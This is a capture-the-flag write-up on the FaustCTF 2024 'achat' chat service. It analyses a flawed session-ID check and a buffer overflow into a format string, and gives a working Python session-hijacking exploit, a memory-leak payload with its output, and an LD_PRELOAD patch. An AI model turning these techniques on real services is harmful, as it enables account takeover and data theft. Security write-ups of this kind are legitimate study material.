Saarsec


Schwenk and pwn

FaustCTF 2024 - achat

achat

achat (asm_chat on the scoreboard) is a binary compiled from C source code and was one of the services in FaustCTF 2024. It implements a simple chat system in which users can create chats with each other and send text messages. It has two vulnerabilities, only one of which is actually exploitable: an overly lax session check and a combined buffer overflow/format string bug.

Service Overview

Users connect to achat on TCP port 1337. The protocol is plaintext-based, with one command per line. Some commands are available to everyone:

register <username> <password>
login <username> <password>
help
emojis

As a registered user, you have some more options:

start-chat <SessionID> <target_user>
send <SessionID> <chat_name> <message>
read <SessionID> <chat_name>
list <SessionID>
list-users <SessionID>
search <SessionID> <Query>

Login is handled with “sessions”, similar to how websites do it. On login (and on registration), you receive a “SessionID”. The binary keeps no login state per connection, so you have to send this SessionID with every further command. Example usage:

nc fd66:666:1::2 1337
> $ register testuser secretpassword
< SessionID: 10581519230505672745
> $ start-chat 10581519230505672745 mkb
< Created the chat: 'mkb&testuser'.
> $ send 10581519230505672745 mkb&testuser Hi, this is a test message!
< send the Message:
< -------------------------------------------------
< Sun Sep 29 11:28:53 2024    testuser
< Hi, this is a test message!
> $ read 10581519230505672745 mkb&testuser                   
< Chat mkb&testuser:
< -------------------------------------------------
< Sun Sep 29 11:28:53 2024    testuser
< Hi, this is a test message!
> $ search 10581519230505672745 test
< Searched as testuser:
< In 'mkb&testuser': -------------------------------------------------
< Sun Sep 29 11:28:53 2024    testuser
< Hi, this is a test message!
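Because every command is a single text line and the session ID has to be repeated each time, a tiny client is enough to talk to the service. The following is a minimal sketch using only Python's standard library; the helper names (`achat_command`, `parse_session_id`, `AchatClient`) are hypothetical, and it assumes replies contain `SessionID: <digits>` and end at a `$` prompt, as in the transcript.

```python
import re
import socket

SESSION_RE = re.compile(r"SessionID:\s*(\d+)")


def achat_command(cmd: str, *args: str) -> bytes:
    """Build one protocol line, e.g. achat_command('read', sid, chat)."""
    line = " ".join((cmd,) + args)
    if "\n" in line:
        raise ValueError("the protocol is line-based; newlines are not allowed")
    return (line + "\n").encode("latin-1")


def parse_session_id(response: str):
    """Return the session ID from a register/login reply, or None."""
    match = SESSION_RE.search(response)
    return match.group(1) if match else None


class AchatClient:
    """Minimal blocking client (assumption: a '$' prompt ends every reply)."""

    def __init__(self, host: str, port: int = 1337):
        self.sock = socket.create_connection((host, port))
        self.buf = b""

    def recv_until_prompt(self) -> str:
        # Read until a '$' arrives; note that a '$' inside a chat message
        # would also end the reply early in this simplified sketch.
        while b"$" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                break
            self.buf += chunk
        data, _, self.buf = self.buf.partition(b"$")
        return data.decode("latin-1")

    def call(self, cmd: str, *args: str) -> str:
        self.sock.sendall(achat_command(cmd, *args))
        return self.recv_until_prompt()
```

Usage would look like `client = AchatClient("fd66:666:1::2")`, then `client.recv_until_prompt()` for the initial prompt and `sid = parse_session_id(client.call("register", "testuser", "secretpassword"))`.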

The command list-users returns a list of all users, which is essentially a list of attack targets. You could also get the gameserver’s usernames from the flag IDs, but we couldn’t make use of them in our exploits and relied on list-users instead.

Storage

achat stores its data in text-based files. The data directory looks like this:

.achat_data/
|- active_sessions
|- chats/
|  |- testuser&checkKLPPQlYmgyKUwPuY
|  \- mkb&testuser
\- users.db

users.db is a text file containing the accounts, one per line, with username and plaintext password. The format is <username>\t<password>\n:

mkb\tpassword\n
checkKLPPQlYmgyKUwPuY\taDAVMx\n
testuser\tsecretpassword\n

active_sessions is also a text file, containing session IDs and the respective username:

01186140060559298948\tcheckKLPPQlYmgyKUwPuY\n
10581519230505672745\ttestuser\n
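Both users.db and active_sessions use the same tab-separated, one-record-per-line layout, so a single parser covers them. A minimal sketch (the function name is hypothetical) that turns the session file into a session-ID-to-username mapping:

```python
def parse_tab_records(text: str) -> list[tuple[str, str]]:
    """Parse '<key>\\t<value>\\n' lines, as used by users.db and active_sessions."""
    records = []
    for line in text.splitlines():
        if not line:
            continue  # ignore empty lines
        key, sep, value = line.partition("\t")
        if not sep:
            raise ValueError(f"malformed line: {line!r}")
        records.append((key, value))
    return records


sessions = parse_tab_records(
    "01186140060559298948\tcheckKLPPQlYmgyKUwPuY\n"
    "10581519230505672745\ttestuser\n"
)
session_to_user = dict(sessions)
```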

Chats are stored in one text file per chat, with 3 lines per message:

-------------------------------------------------\n
Sun Sep 29 11:28:53 2024\ttestuser\n
Hi, this is a test message!\n
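The chat format can be read back in steps of three lines (separator, timestamp/author, text). A sketch with hypothetical names; unlike the binary, which tokenizes with strtok and therefore silently skips empty lines, it assumes a well-formed file:

```python
from dataclasses import dataclass


@dataclass
class ChatMessage:
    timestamp: str
    author: str
    text: str


def parse_chat(content: str) -> list[ChatMessage]:
    """Split a chat file into messages of exactly three lines each."""
    lines = content.split("\n")
    messages = []
    # Walk the file three lines at a time: separator, header, message text.
    for i in range(0, len(lines) - 2, 3):
        separator, header, text = lines[i:i + 3]
        if not separator.startswith("-"):
            raise ValueError(f"expected a separator line at line {i}")
        timestamp, _, author = header.partition("\t")
        messages.append(ChatMessage(timestamp, author, text))
    return messages
```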

Some more advanced permission mechanism appears to be in place, so that the service can append to each file but can neither remove nor overwrite content. We haven’t checked this in detail.

Vulnerability 1: Incorrect session validation

Session IDs are not properly validated. Here’s the decompiled and annotated function validate_session_id:

char *__fastcall validate_session_id(const char *sid) {
  char *result; // rax MAPDST
  char *sid_in_file; // [rsp+10h] [rbp-20h]
  char *session_file; // [rsp+18h] [rbp-18h]
  const char *username; // [rsp+20h] [rbp-10h]

  if ( strlen(sid) != 20 )
    return 0LL;
  session_file = read_in_file(".achat_data/active_sessions");
  if ( !session_file )
    return 0LL;
  sid_in_file = strstr(session_file, sid);      // search string sid in session file
  if ( !sid_in_file )
    goto not_found;
  while ( *sid_in_file != '\t' )                // go to next tab character
    ++sid_in_file;
  username = strtok(sid_in_file + 1, "\n");     // session belongs to the username after the tab
  if ( username )
  {
    result = strdup(username);
    free(session_file);
  }
  else
  {
not_found:
    free(session_file);
    result = 0LL;
  }
  return result;
}

First, this function ensures that the session ID is exactly 20 characters long (but not that it is numeric). Second, it searches for the session ID anywhere in the session file, not only at the start of a line. Third, it advances to the next tab character, but does not check that this tab directly follows the 20 matched characters.

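We can exploit this with any username of at least 20 characters that appears in the sessions file. If we send 20 characters of such a username (we use the last 20) as a session ID, strstr finds them in the username column, and the loop skips over the rest of that username, the \n and the next session ID until it reaches the next tab. The function then returns the username of the following session instead.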

Normal algorithm operation:

...\n12345678901234567890\tusername1\n   // session file
     ↑                    ↑         ↑
   strstr result     after loop  end strtok // query "12345678901234567890"

=> return "username1"

Operation with long username as sid:

...\n11111222223333344444\talonglonglongusername\n55555666667777788888\tvictimuser\n...    // session file
                            ↑                                           ↑         ↑
                          strstr result                            after loop  end strtok  // query "longlonglongusername"

=> return "victimuser"
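To play with the bug offline, here is a small Python model of the decompiled function that takes the session file contents as a string instead of reading .achat_data/active_sessions. It is an illustrative sketch, not the binary's code, and its signature is made up:

```python
def validate_session_id(session_file: str, sid: str):
    """Model of the decompiled validate_session_id; returns a username or None."""
    if len(sid) != 20:                  # only the length is checked, not the digits
        return None
    pos = session_file.find(sid)        # strstr: a match anywhere in the file counts
    if pos == -1:
        return None
    tab = session_file.find("\t", pos)  # advance to the *next* tab, wherever it is
    if tab == -1:
        return None                     # the C loop would run past the buffer here
    # strtok(sid_in_file + 1, "\n") skips leading newlines, returns the next token
    tokens = [t for t in session_file[tab + 1:].split("\n") if t]
    return tokens[0] if tokens else None


session_file = (
    "11111222223333344444\talonglonglongusername\n"
    "55555666667777788888\tvictimuser\n"
)
```

With this file, the real session ID `11111222223333344444` yields `alonglonglongusername`, while the 20-character suffix `longlonglongusername` yields `victimuser`, exactly as in the second diagram.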

The Exploit

First, we list all users. Next, we attack every username with at least 20 characters: using its last 20 characters as a session ID, we re-use the first session that was created after the user’s initial registration. The gameserver registers a lot of 21-character users named check..., so we have plenty of targets.

After hijacking a session, we can either list and read all chats or use the search command to find flags in chats.

import random
import re
import string

from pwn import remote


def exploit_session_validation(target):
    conn = remote(target, 1337)
    conn.recvuntil(b'$')

    # register a throwaway account to get a valid session ID for list-users
    username = ''.join(random.choice(string.ascii_lowercase) for _ in range(16))
    password = ''.join(random.choice(string.ascii_lowercase) for _ in range(20))
    conn.sendline(f'register {username} {password}'.encode())
    sid = re.findall(r'\d{15,20}', conn.recvuntil(b'$').decode())[0]

    conn.sendline(f'list-users {sid}'.encode())
    data = conn.recvuntil(b'$')
    users = re.findall(r'> ([^\n]+)\n', data.decode())

    for user in users[::-1][:100]:  # attack newest 100 users
        # works only if username is at least 20 characters
        if len(user) < 20:
            continue
        fake_sid = user[-20:]  # last 20 characters of the username as "session ID"

        # V1: list & read all chats
        conn.sendline(f'list {fake_sid}'.encode())
        chats = re.findall(r'\t> ([^\n]+)\n', conn.recvuntil(b'$').decode())
        for chat in chats:
            conn.sendline(f'read {fake_sid} {chat}'.encode())
            print(conn.recvuntil(b'$').decode())

        # V2: search for flags in all chats
        conn.sendline(f'search {fake_sid} FAU'.encode())
        print(conn.recvuntil(b'$').decode())

    conn.close()
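The exploit only prints the replies; before submission, the flags still have to be cut out of the read/search output. A minimal sketch, assuming flags look like `FAUST_` followed by 32 base64 characters (check the official rules and adjust `FLAG_RE` if that assumption is wrong):

```python
import re

# Assumption: FaustCTF flag format "FAUST_" + 32 base64 characters.
FLAG_RE = re.compile(r"FAUST_[A-Za-z0-9+/]{32}")


def extract_flags(outputs):
    """Collect unique flags from read/search replies, keeping first-seen order."""
    seen = {}
    for text in outputs:
        for flag in FLAG_RE.findall(text):
            seen.setdefault(flag, None)  # dicts preserve insertion order
    return list(seen)
```

Deduplication matters here because the same flag usually shows up both in `read` and in `search` output.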

Patching

Patching the binary wasn’t easy, so we used a preloaded library that hooks the strstr function. In it, we ensured that any search string (needle) of length 20 must be numeric, which usernames cannot be. Note that this introduces a bug in the “search chats” feature: you can no longer search chats for non-numeric strings of exactly 20 characters. But the gameserver apparently never did that, and the attacks stopped.

// musl-gcc -fPIC libpatch.c -shared -o libpatch.so
#define _GNU_SOURCE  // memmem is a GNU/BSD extension
#include <string.h>

// replaces libc's strstr for the whole process
char *strstr(const char *s1, const char *s2) {
    size_t len1 = strlen(s1);
    size_t len2 = strlen(s2);
    // validate_session_id always calls strstr with a 20-character session ID
    if (len2 == 20) {
        // ensure it's purely numeric, otherwise report "not found"
        for (size_t i = 0; i < 20; i++) {
            if (s2[i] < '0' || s2[i] > '9') {
                return NULL;
            }
        }
    }
    // use memmem so that we don't have to look up the original strstr
    return memmem(s1, len1, s2, len2);
}
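The filtering rule can be sanity-checked before deploying the library. This Python model mirrors the C patch (returning an index or -1 instead of a pointer or NULL); it is only an illustration, since the real check runs in C inside the service. It shows both the intended effect on session validation and the side effect on 20-character chat searches:

```python
def patched_strstr(haystack: str, needle: str) -> int:
    """Model of the preloaded strstr: index of the first match, or -1 for NULL."""
    if len(needle) == 20:
        # same rule as libpatch.c: 20-character needles must be ASCII digits
        if any(c < "0" or c > "9" for c in needle):
            return -1
    return haystack.find(needle)  # plays the role of memmem


sessions = (
    "11111222223333344444\talonglonglongusername\n"
    "55555666667777788888\tvictimuser\n"
)
```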

Finally, we loaded this library into the service using LD_PRELOAD in the docker-compose file:

services:
  achat:
    # ...
    volumes:
      # ...
      - ./libpatch.so:/libpatch.so
    environment:
      LD_PRELOAD: "/libpatch.so"

A more advanced version of this patch method appeared in the Discord channel after the event.

(not exploitable) Vulnerability 2: Buffer Overflow into Format String

The function search_in_chat allocates two buffers on the stack (with alloca). One of them holds a format string. The other one receives the chat message, which can be arbitrarily long, via unbounded strcpy/strcat calls. Because report_message is allocated after formatstring_on_stack, it lies at a lower address, so we can overflow the chat message buffer (report_message in the decompiled code) upwards into the format string (formatstring_on_stack) and prepare a format string attack.

Using this format string attack, we can leak pointers and a bit of stack memory. But due to the restrictions on user input, we cannot get arbitrary read/write and thus no remote code execution. The vulnerability was hard for us to spot because the decompiler messed up the stack allocations.

__int64 __fastcall search_in_chat(char *chat, char *query, char *username) {
  void *v3; // rsp
  void *v5; // rsp
  void *v6; // rsp
  size_t v7; // rax
  size_t v8; // rax
  size_t v9; // rax
  size_t v10; // rax
  size_t v11; // rax
  size_t v12; // rax
  __int64 v13; // r8
  __int64 v14; // r9
  char *chatcontent_tmp; // [rsp+28h] [rbp-48h]
  char *dest; // [rsp+30h] [rbp-40h]
  char *chatcontent; // [rsp+38h] [rbp-38h]
  char *formatstring_on_stack; // [rsp+40h] [rbp-30h]
  char *report_message; // [rsp+48h] [rbp-28h]
  char *msg_part1; // [rsp+50h] [rbp-20h]
  char *msg_part2; // [rsp+58h] [rbp-18h]
  char *msg_part3; // [rsp+60h] [rbp-10h]
  unsigned __int64 canary; // [rsp+68h] [rbp-8h]

  canary = __readfsqword(0x28u);
  // read the chat file
  dest = alloca(strlen(chat) + strlen(username) + ...)
  strcpy(dest, ".achat_data/chats/");
  strcat(dest, chat);
  chatcontent = read_in_file(dest);
  if ( !chatcontent )
    return 0xFFFFFFFFLL;
  formatstring_on_stack = alloca(272LL);  // we'll overflow into this buffer
  strcpy(formatstring_on_stack, "Searched as %ss:\nIn '%s': %s\n");
  chatcontent_tmp = chatcontent;
  report_message = alloca(272LL);         // we'll overflow this buffer
  while ( 1 ) {
    // each chat message is 3 lines, parse all 3
    msg_part1 = strtok(chatcontent_tmp, "\n");
    if ( !msg_part1 )
      break;
    chatcontent_tmp = 0LL;
    msg_part2 = strtok(0LL, "\n");
    if ( !msg_part2 )
      break;
    msg_part3 = strtok(0LL, "\n");
    if ( !msg_part3 )
      break;
    // concat all infos together in the report_message buffer
    strcpy(report_message, msg_part1);
    v7 = strlen(report_message);
    report_message[v7 + 1] = 0;
    v8 = strlen(report_message);
    report_message[v8] = '\n';
    strcat(report_message, msg_part2);
    v9 = strlen(report_message);
    report_message[v9 + 1] = 0;
    v10 = strlen(report_message);
    report_message[v10] = '\n';
    strcat(report_message, msg_part3);  // part3 is arbitrary length input, overflow happens here
    v11 = strlen(report_message);
    report_message[v11 + 1] = 0;
    v12 = strlen(report_message);
    report_message[v12] = '\n';
    // send concatted infos if chat message matches query
    if ( strstr(msg_part3, query) )
      send_msg(formatstring_on_stack, username, chat, report_message);  // printf-like format string invocation
  }
  free(chatcontent);
  return 0LL;
}
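The amount of filler in the payloads that follow plausibly comes from this layout: report_message holds the separator line, a newline, the timestamp/username line, another newline and then the message. The sketch below computes how many message bytes fill report_message exactly. It rests on two assumptions: the separator line has 49 dashes (which makes 180 come out for 16-character usernames), and formatstring_on_stack directly follows report_message on the stack. The helper names are hypothetical.

```python
BUFFER_SIZE = 272      # alloca(272LL) for report_message
SEPARATOR_LEN = 49     # assumption: number of dashes in the separator line
TIMESTAMP_LEN = len("Sun Sep 29 11:28:53 2024")  # fixed-width ctime-style timestamp


def filler_length(username_len: int,
                  separator_len: int = SEPARATOR_LEN,
                  buffer_size: int = BUFFER_SIZE) -> int:
    """Number of message bytes that exactly fill report_message.

    report_message = separator + "\\n" + timestamp + "\\t" + username + "\\n" + message
    Message bytes beyond this length spill into the adjacent format string buffer.
    """
    prefix = separator_len + 1 + TIMESTAMP_LEN + 1 + username_len + 1
    return buffer_size - prefix


def build_leak_payload(username_len: int, n_specifiers: int) -> str:
    """Filler up to the format string buffer, followed by %p specifiers."""
    return "A" * filler_length(username_len) + "%p" * n_specifiers
```

If the assumed separator length is off by one, the first format string byte is an `A` instead of `%`, which printf simply echoes, so the leak still works.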

Leaking pointers

To trigger the vulnerability, we send a string like AAA...AAA%p%p%p...%p in a chat and then search for it. The As fill up the original buffer (report_message), and the %p specifiers spill over into the format string (formatstring_on_stack), where send_msg interprets them and leaks stack memory:

import random
import re
import string

from pwn import remote


def search_for_chat_message(target, chatmsg: str) -> bytes:
    """Connect to the service, send a chat message, search for it, return result of search"""
    conn = remote(target, 1337)

    # register a fresh user and open a chat with the user mkb
    username = ''.join(random.choice(string.ascii_lowercase) for _ in range(16))
    password = ''.join(random.choice(string.ascii_lowercase) for _ in range(20))
    conn.recvuntil(b'$')
    conn.sendline(f'register {username} {password}'.encode())
    sid = re.findall(r'\d{15,20}', conn.recvuntil(b'$').decode())[0]
    conn.sendline(f'start-chat {sid} mkb'.encode())
    chatname = re.findall(r"'(.*)'", conn.recvuntil(b'$').decode())[0]

    # latin-1 maps each character to exactly one byte, so raw bytes survive
    conn.sendline(f'send {sid} {chatname} {chatmsg}'.encode('latin-1'))
    conn.recvuntil(b'$')
    # searching for the message prefix makes search_in_chat process our message
    conn.sendline(f'search {sid} {chatmsg[:8]}'.encode())
    result = conn.recvuntil(b'$ ')
    conn.close()
    return result


def demo_leak_memory(target):
    chatmsg = 'A' * 180 + '%p' * 150  # <-- this is the payload
    result_binary = search_for_chat_message(target, chatmsg)
    result = result_binary.decode('latin-1').strip().replace('|', '\n').replace('0x', '\n0x')
    print(result)

If we run this script, we see plenty of interesting pointers. With more effort, we could determine which of them gives a stable offset into the binary. (By the way, the memory layout stays constant across connections, because the service forks for each connection and every child inherits the same layout.)

0x729f933c9ce0      # sth close to libc (@ 0x729f93313000)
0x5a1ada9bc643      # binary, rw section
0x7ffd31fd6b800
0x8080808080808080
0x2d2d2d2d2d2d2d2d  # the other string buffers on stack
...                 # our string buffer on stack
0x7025702570257025
0x729f933c000a      # sth close to libc
0x1
0x7ffd31fd6e40
0x5a1ada9b92ef      # binary, code pointer
0x645f74616863612e
0x746168632f617461
0x6c637163796c2f73
0x636b7a6c61786d6a
0x626b6d266665
0x5a1ada9b926f      # binary, code pointer
0x7ffd31fd7128
0x729f933c9ce0      # sth close to libc
0x5a1ada9bc8ec      # binary, rw section
0x5a1ada9bc643      # binary, rw section
...
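Annotating such a dump by hand gets tedious. The following heuristic sketch extracts all %p values from a reply and guesses their memory region from typical x86-64 Linux address ranges. The ranges are assumptions (ASLR entropy and PIE placement depend on kernel settings), so the labels are hints, not facts:

```python
import re

HEX_RE = re.compile(r"0x[0-9a-fA-F]+")


def parse_leak(text: str) -> list[int]:
    """Extract all %p values from the service's reply."""
    return [int(h, 16) for h in HEX_RE.findall(text)]


def classify(value: int) -> str:
    """Rough guess of the region a leaked value points into (heuristic only)."""
    if 0x7FF000000000 <= value < 0x800000000000:
        return "stack?"
    if 0x700000000000 <= value < 0x7FF000000000:
        return "libc/mmap?"
    if 0x550000000000 <= value < 0x660000000000:
        return "PIE binary/heap?"
    return "data"
```

Once a pointer into the binary has been identified, subtracting its offset gives the base address, which, thanks to forking, stays valid for later connections.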

(almost) reading/writing memory

To read or write memory with printf, we need a target address on the stack and a formatter like %1$s or %1$hhn that reads from or writes to this address. But there are three problems here:

  1. musl's printf is quite limited: it only accepts single-digit argument positions (%1$ to %9$), so the popular %123$p formatters don’t work. Thus, we have to build long format strings, and we can use each address on the stack only once.
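  2. We cannot write 0x10 or 0x00 bytes in our buffer, but these are required to write full target addresses (on x86-64, user-space addresses are 48 bits wide, so the two most significant bytes, which come last in little-endian memory, are always 0x00).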
  3. Finally, our string is always terminated by a \n, so we cannot even get a single address in the buffer:
def demo_format_string(target):
    chatmsg = 'A' * 180 + '%p' * 55 + '|>>>%p<<<|' + '%p' * 4
    chatmsg += '\x08\xc0\x9b\xda\x1a\x5a'  # 0x5a1ada9bc008, little-endian
    result_binary = search_for_chat_message(target, chatmsg)
    result = result_binary.decode('latin-1').strip().replace('|', '\n').replace('0x', '\n0x')
    print(result)
0x729f933c9ce0
0x729f9330e143
0x7ffd31fd6b800
0x8080808080808080
0x2d2d2d2d2d2d2d2d
...
0x4141414141414141
0x4141414141414141
...
0x7025702570257025
0x7025702570257025
0x7025702570257025
0x3e7c702570257025
0x7c3c3c3c70253e3e
0x7025702570257025
>>>0xa5a1ada9bc008<<<  # notice the leading "a", which was not part of our input
0x1000
0x8
0x66f9134d
0x57faec...

We wrote 0x5a1ada9bc008, but ended up with 0x0a5a1ada9bc008 on the stack: the \n that search_in_chat appends after every message lands in the seventh byte of the stack slot. No mapped address starts with 0x0a, and we would likely need 3-4 addresses anyway, so we cannot use this vulnerability to read or write arbitrary memory.
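The corrupted value can be reproduced offline. The sketch below (the helper name is hypothetical) packs the six address bytes the way search_in_chat leaves them on the stack, followed by the '\n' and '\0' the function writes after the message. It assumes, as in the output above, that the six bytes start at an 8-byte-aligned slot:

```python
import struct


def slot_after_message(addr_bytes: bytes) -> int:
    """Value of the 8-byte stack slot when the message ends with addr_bytes.

    search_in_chat writes '\\n' and then '\\0' right after the message text,
    so a 6-byte address is followed by 0x0a 0x00 inside the same slot.
    """
    if len(addr_bytes) != 6:
        raise ValueError("expected the 6 low bytes of an address")
    if b"\n" in addr_bytes or b"\x00" in addr_bytes:
        raise ValueError("the message cannot contain newline or NUL bytes")
    return struct.unpack("<Q", addr_bytes + b"\n\x00")[0]


slot = slot_after_message(b"\x08\xc0\x9b\xda\x1a\x5a")
```

The result is 0x0a5a1ada9bc008, which lies above the highest user-space address 0x7fffffffffff, so dereferencing it with %s or %n would just crash.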

Summary

achat was a nice and understandable binary. We got our exploit working 15 minutes after the network opened and scored first blood. Other teams started to exploit the same vulnerability later. However, at the end of the game, some teams had accumulated more points than we did, even though no other achat exploit had appeared on the network. We still do not understand what happened there, because our exploit ran smoothly throughout the whole game.

It was a bit sad to learn that the format string vulnerability is not exploitable after we had spent so many hours on it. The challenge author later confirmed that he hadn’t tested it. From a strategic point of view, we would have gotten more points if we had spent that time on other services instead. But overall, this was a nice challenge with a medium and a harder vulnerability, and I enjoyed it a lot.